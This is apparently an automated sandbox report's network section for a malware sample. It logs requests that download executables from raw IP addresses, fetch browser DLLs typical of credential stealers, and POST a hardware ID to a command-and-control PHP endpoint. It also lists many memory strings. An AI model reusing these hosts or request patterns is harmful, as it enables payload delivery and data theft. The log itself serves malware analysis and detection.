                            Source: global trafficHTTP traffic detected: GET /ping.php?substr=eight HTTP/1.1Host: 185.172.128.228User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
                            Source: global trafficHTTP traffic detected: GET /syncUpd.exe HTTP/1.1Host: 185.172.128.59User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
                            Source: global trafficHTTP traffic detected: GET /1/Qg_Appv5.exe HTTP/1.1Host: note.padd.cn.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
                            Source: global trafficHTTP traffic detected: GET /BroomSetup.exe HTTP/1.1Host: 185.172.128.228User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
                            Source: global trafficHTTP traffic detected: POST /__svc/sbv/DownloadManager.ashx HTTP/1.0Connection: keep-aliveContent-Length: 300Host: svc.iolo.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: identityUser-Agent: Mozilla/3.0 (compatible; Indy Library)
                            Source: unknownHTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49716 version: TLS 1.0
                            Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.90
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.228
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: 0_2_00426504 __EH_prolog,SetThreadLocale,WSAStartup,socket,WSACleanup,gethostbyname,htons,connect,send,send,recv,recv,recv,recv,recv,WSACleanup,closesocket,0_2_00426504
                            Source: global trafficHTTP traffic detected: GET /15f649199f40275b/sqlite3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /15f649199f40275b/freebl3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /15f649199f40275b/mozglue.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /15f649199f40275b/msvcp140.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /15f649199f40275b/nss3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /15f649199f40275b/softokn3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /15f649199f40275b/vcruntime140.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
                            Source: unknownDNS traffic detected: queries for: note.padd.cn.com
                            Source: unknownHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JEGHJKFHJJJKJJJJKEHCHost: 185.172.128.76Content-Length: 216Connection: Keep-AliveCache-Control: no-cache Data Ascii: ------JEGHJKFHJJJKJJJJKEHCContent-Disposition: form-data; name="hwid"59C3C005F9E64120021454------JEGHJKFHJJJKJJJJKEHCContent-Disposition: form-data; name="build"default10------JEGHJKFHJJJKJJJJKEHC--
                            Source: u3z0.0.exe, 00000002.00000002.2435497430.00000000043DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76
                            Source: u3z0.0.exe, 00000002.00000002.2435664162.0000000004438000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/15f649199f40275b/freebl3.dll
                            Source: u3z0.0.exe, 00000002.00000002.2435664162.0000000004438000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/15f649199f40275b/mozglue.dll
                            Source: u3z0.0.exe, 00000002.00000002.2435664162.0000000004438000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/15f649199f40275b/mozglue.dllI
                            Source: u3z0.0.exe, 00000002.00000002.2435664162.0000000004438000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/15f649199f40275b/msvcp140.dll
                            Source: u3z0.0.exe, 00000002.00000002.2435664162.0000000004402000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/15f649199f40275b/nss3.dll
                            Source: u3z0.0.exe, 00000002.00000002.2435664162.0000000004438000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/15f649199f40275b/softokn3.dll
                            Source: u3z0.0.exe, 00000002.00000002.2435664162.0000000004438000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/15f649199f40275b/softokn3.dllc
                            Source: u3z0.0.exe, 00000002.00000002.2435664162.0000000004438000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/15f649199f40275b/sqlite3.dll
                            Source: u3z0.0.exe, 00000002.00000002.2435664162.0000000004438000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/15f649199f40275b/vcruntime140.dll
                            Source: u3z0.0.exe, 00000002.00000002.2435664162.0000000004438000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/15f649199f40275b/vcruntime140.dllC
                            Source: u3z0.0.exe, 00000002.00000002.2435664162.0000000004438000.00000004.00000020.00020000.00000000.sdmp, u3z0.0.exe, 00000002.00000002.2435664162.0000000004457000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/3cd2b41cbde8fc9c.php
                            Source: u3z0.0.exe, 00000002.00000002.2435664162.0000000004438000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/3cd2b41cbde8fc9c.php)
                            Source: u3z0.0.exe, 00000002.00000002.2435664162.0000000004402000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/3cd2b41cbde8fc9c.php-minuser-l1-1-0
                            Source: u3z0.0.exe, 00000002.00000002.2435664162.0000000004438000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/3cd2b41cbde8fc9c.phpA
                            Source: u3z0.0.exe, 00000002.00000002.2435664162.0000000004438000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/3cd2b41cbde8fc9c.phpM
                            Source: u3z0.0.exe, 00000002.00000002.2435664162.0000000004438000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/3cd2b41cbde8fc9c.phpQ
                            Source: u3z0.0.exe, 00000002.00000002.2435664162.0000000004438000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/3cd2b41cbde8fc9c.phpY
                            Source: u3z0.0.exe, 00000002.00000002.2435664162.0000000004438000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/3cd2b41cbde8fc9c.phpa
                            Source: u3z0.0.exe, 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: http://185.172.128.76/3cd2b41cbde8fc9c.phpc906315950e2729657ad6775bff99-release2f2345b38ae43488aec06
                            Source: u3z0.0.exe, 00000002.00000002.2435664162.0000000004457000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/3cd2b41cbde8fc9c.phpf
                            Source: u3z0.0.exe, 00000002.00000002.2435664162.0000000004457000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/3cd2b41cbde8fc9c.phpft
                            Source: u3z0.0.exe, 00000002.00000002.2435664162.0000000004402000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/3cd2b41cbde8fc9c.phpnts
                            Source: u3z0.0.exe, 00000002.00000002.2435664162.0000000004457000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/3cd2b41cbde8fc9c.phpt
                            Source: u3z0.0.exe, 00000002.00000002.2435664162.0000000004438000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/3cd2b41cbde8fc9c.phpu
                            Source: MSBuild.exe, 00000012.00000002.3318395339.00000000032CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.215.85.66:9000
                            Source: MSBuild.exe, 00000012.00000002.3318395339.00000000032CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.215.85.66:9000/wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F
                            Source: Qg_Appv5.exe, 00000004.00000002.2307968581.0000000007315000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000005.00000002.2244250697.00000000034E5000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000006.00000002.2308308308.0000000003B73000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2530191381.0000000005361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
                            Source: Qg_Appv5.exe, 00000004.00000002.2307968581.0000000007315000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000005.00000002.2244250697.00000000034E5000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000006.00000002.2308308308.0000000003B73000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2530191381.0000000005361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCodeSigningCA-1.crt0
                            Source: Qg_Appv5.exe, 00000004.00000002.2307968581.0000000007315000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000005.00000002.2244250697.00000000034E5000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000006.00000002.2308308308.0000000003B73000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2530191381.0000000005361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3457587705.0000013E50160000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3480582063.0000013E506C0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3309717239.0000013E37370000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3451850676.0000013E4FF10000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3457587705.0000013E50160000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertCSRSA4096RootG5.crt0E
                            Source: 4BfhCycV4B.exe, 00000000.00000003.2263644143.0000000006F1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
                            Source: 4BfhCycV4B.exe, 00000000.00000003.2263644143.0000000006F1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
                            Source: Qg_Appv5.exe, 00000004.00000002.2307968581.0000000007315000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000005.00000002.2244250697.00000000034E5000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000006.00000002.2308308308.0000000003B73000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2530191381.0000000005361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3480582063.0000013E506C0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3309717239.0000013E37370000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3451850676.0000013E4FF10000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3457587705.0000013E50160000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3480582063.0000013E506C0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3309717239.0000013E37370000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3451850676.0000013E4FF10000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3457587705.0000013E50160000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3480582063.0000013E506C0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3309717239.0000013E37370000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3451850676.0000013E4FF10000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3457587705.0000013E50160000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/NETFoundationProjectsCodeSigningCA2.crt0
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3445939052.0000013E4FD20000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://compositewpf.codeplex.com/
                            Source: 4BfhCycV4B.exe, 00000000.00000003.2197046081.000000000732F000.00000004.00000020.00020000.00000000.sdmp, Qg_Appv5.exe, 00000004.00000002.2290860423.0000000004FF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                            Source: 4BfhCycV4B.exe, 00000000.00000003.2197046081.000000000732F000.00000004.00000020.00020000.00000000.sdmp, Qg_Appv5.exe, 00000004.00000002.2290860423.0000000004FF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
                            Source: 4BfhCycV4B.exe, 00000000.00000003.2197046081.000000000732F000.00000004.00000020.00020000.00000000.sdmp, Qg_Appv5.exe, 00000004.00000002.2290860423.0000000004FF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
                            Source: 4BfhCycV4B.exe, 00000000.00000003.2263644143.0000000006F1D000.00000004.00000020.00020000.00000000.sdmp, 4BfhCycV4B.exe, 00000000.00000003.2197046081.000000000732F000.00000004.00000020.00020000.00000000.sdmp, Qg_Appv5.exe, 00000004.00000002.2290860423.0000000004FF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
                            Source: MSBuild.exe, 00000012.00000002.3394791765.00000000043DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                            Source: MSBuild.exe, 00000012.00000002.3394791765.00000000043DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                            Source: MSBuild.exe, 00000012.00000002.3394791765.00000000043DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3457587705.0000013E50160000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/JamesNK/Newtonsoft.Json
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3446743934.0000013E4FD50000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/Microsoft/ApplicationInsights-dotnet
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3463758069.0000013E50390000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/itfoundry/Poppins)
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3463758069.0000013E50390000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/itfoundry/Poppins)&&&&l
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3463758069.0000013E50390000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/itfoundry/Poppins)&&&&m
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3463758069.0000013E50390000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/itfoundry/Poppins)&&&&o
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3463758069.0000013E50390000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/itfoundry/Poppins)&&&&r
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3463758069.0000013E50390000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/itfoundry/Poppins)&&&&s
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3463758069.0000013E50390000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/itfoundry/Poppins)&&&&v
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3463758069.0000013E50390000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/itfoundry/Poppins)&&&&z
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3446743934.0000013E4FD50000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/microsoft/ApplicationInsights-dotnet/issues/2560
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3311609654.0000013E37561000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://iolo.azure-api.net/ent/v1
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3311609654.0000013E37561000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://iolo.comH42652B74-0AD8-4B60-B8FD-69ED38F7666B
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3446743934.0000013E4FD50000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://monitor.azure.com//.default
                            Source: MSBuild.exe, 00000012.00000002.3318395339.00000000032CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/z9pYkqPQ
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3446743934.0000013E4FD50000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://profiler.monitor.azure.com/l
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3446743934.0000013E4FD50000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://rt.services.visualstudio.com/l
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3450053584.0000013E4FE40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://scripts.sil.org/OFL
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3463758069.0000013E50390000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://scripts.sil.org/OFLThis
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3463758069.0000013E50390000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://scripts.sil.org/OFLhttps://indiantypefoundry.comNinad
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3450053584.0000013E4FE40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://scripts.sil.org/OFLins
                            Source: 4BfhCycV4B.exe, 00000000.00000003.2197046081.000000000732F000.00000004.00000020.00020000.00000000.sdmp, Qg_Appv5.exe, 00000004.00000002.2290860423.0000000004FF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
                            Source: 4BfhCycV4B.exe, 00000000.00000003.2263644143.0000000006F1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0D
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3446743934.0000013E4FD50000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://snapshot.monitor.azure.com/&
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3311609654.0000013E37CB9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.iolo.com/support
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3311609654.0000013E37CB9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.iolo.com/support/solutions/articles/44
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3311609654.0000013E37AAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.iolo.com/support/solutions/articles/44001781185
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3463758069.0000013E50390000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://support.iolo.com/support/solutions/articles/44001781185?
                            Source: u3z0.0.exe, 00000002.00000003.2203177819.00000000309CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                            Source: u3z0.0.exe, 00000002.00000003.2203177819.00000000309CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3311609654.0000013E37561000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://webhooklistenersfunc.azurewebsites.net/api/lookup/constella-dark-web-alerts
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3311609654.0000013E37561000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://westus2-2.in.applicationinsights.azure.com/;LiveEndpoint=https://westus2.livediagnostics.mon
                            Source: 4BfhCycV4B.exe, 00000000.00000003.2263644143.0000000006F1D000.00000004.00000020.00020000.00000000.sdmp, Qg_Appv5.exe, 00000004.00000002.2307968581.0000000007315000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000005.00000002.2244250697.00000000034E5000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000006.00000002.2308308308.0000000003B73000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2530191381.0000000005361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                            Source: u3z0.0.exe, 00000002.00000002.2435664162.0000000004457000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000012.00000002.3394791765.00000000043DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                            Source: MSBuild.exe, 00000012.00000002.3394791765.00000000043DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3311609654.0000013E37561000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.iolo.com/company/legal/eula/
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3463758069.0000013E50390000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.iolo.com/company/legal/eula/?
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3311609654.0000013E37561000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3311609654.0000013E37947000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.iolo.com/company/legal/privacy/
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3463758069.0000013E50390000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.iolo.com/company/legal/privacy/?
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3311609654.0000013E37561000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.iolo.com/company/legal/sales-policy/
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3463758069.0000013E50390000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.iolo.com/company/legal/sales-policy/?
                            Source: u3z0.0.exe, 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: https://www.mozilla.org/about/
                            Source: u3z0.0.exe, 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: https://www.mozilla.org/about/dHh0
                            Source: u3z0.0.exe, 00000002.00000003.2203177819.00000000309CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
                            Source: u3z0.0.exe, 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
                            Source: u3z0.0.exe, 00000002.00000003.2203177819.00000000309CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
                            Source: u3z0.0.exe, 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
                            Source: u3z0.0.exe, 00000002.00000003.2203177819.00000000309CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                            Source: u3z0.0.exe, 00000002.00000003.2203177819.00000000309CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                            Source: u3z0.0.exe, 00000002.00000003.2203177819.00000000309CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
                            Source: u3z0.0.exe, 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/
                            Source: u3z0.0.exe, 00000002.00000003.2203177819.00000000309CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                            Source: u3z0.0.exe, 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/host.exe
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3457587705.0000013E50160000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.newtonsoft.com/json
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3457587705.0000013E50160000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.newtonsoft.com/jsonschema
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3457587705.0000013E50160000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
                            Source: unknown, Network traffic detected: HTTP traffic on port 49674 -> 443
                            Source: unknown, Network traffic detected: HTTP traffic on port 49675 -> 443
                            Source: unknown, Network traffic detected: HTTP traffic on port 49673 -> 443
                            Source: unknown, Network traffic detected: HTTP traffic on port 49703 -> 443
                            Source: unknown, Network traffic detected: HTTP traffic on port 49726 -> 443
